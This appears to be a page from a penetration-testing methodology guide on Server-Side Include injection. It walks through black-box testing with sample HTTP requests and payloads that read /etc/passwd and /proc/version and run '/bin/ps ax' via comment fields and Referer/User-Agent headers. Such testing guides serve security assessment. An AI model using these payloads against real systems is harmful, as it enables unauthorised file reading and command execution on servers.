SSI Injection

Check List

Methodology

Black Box

Read Sensitive File via Server Side Include

Identify the target web application and perform basic information gathering to determine the web server type

Check whether the server potentially supports Server-Side Includes (SSI) by ( Looking for .shtml files in the application or Inspecting response headers and server banners)

Identify all possible user input points, including ( Cookie , comments,)

Select an input field that reflects user-supplied data back into the application (error messages, forum posts, profile fields) like

POST /comment HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

comment=HelloWorld

Submit a test payload containing an SSI directive, such as

<!--#include virtual="/etc/passwd" -->

Injected request

POST /comment HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

comment=<!--#include virtual="/etc/passwd" -->

Then, check the server response to see if the payloads we injected are displayed and processed in the response and include the contents of the sensitive etc/passwd file. If so, the vulnerability is successfully confirmed

Sever Side Including in HTTP Header

injection via HTTP headers, for example:

GET / HTTP/1.1
Host: target.com
Referer: <!--#exec cmd="/bin/ps ax"-->
User-Agent: <!--#include virtual="/proc/version"-->

Send the crafted request using a proxy tool (Burp Suite Repeater)

Observe whether the injected SSI directives are executed or included in the generated page

Conclude that the application is vulnerable to SSI Injection if server-side directives are successfully executed

White Box

Cheat Sheet

PreviousXML Injection NextXPath Injection

Last updated 1 month ago

hashtagCheck List

hashtagMethodology

hashtagBlack Box

hashtagRead Sensitive File via Server Side Include

hashtagSever Side Including in HTTP Header

hashtagWhite Box

hashtagCheat Sheet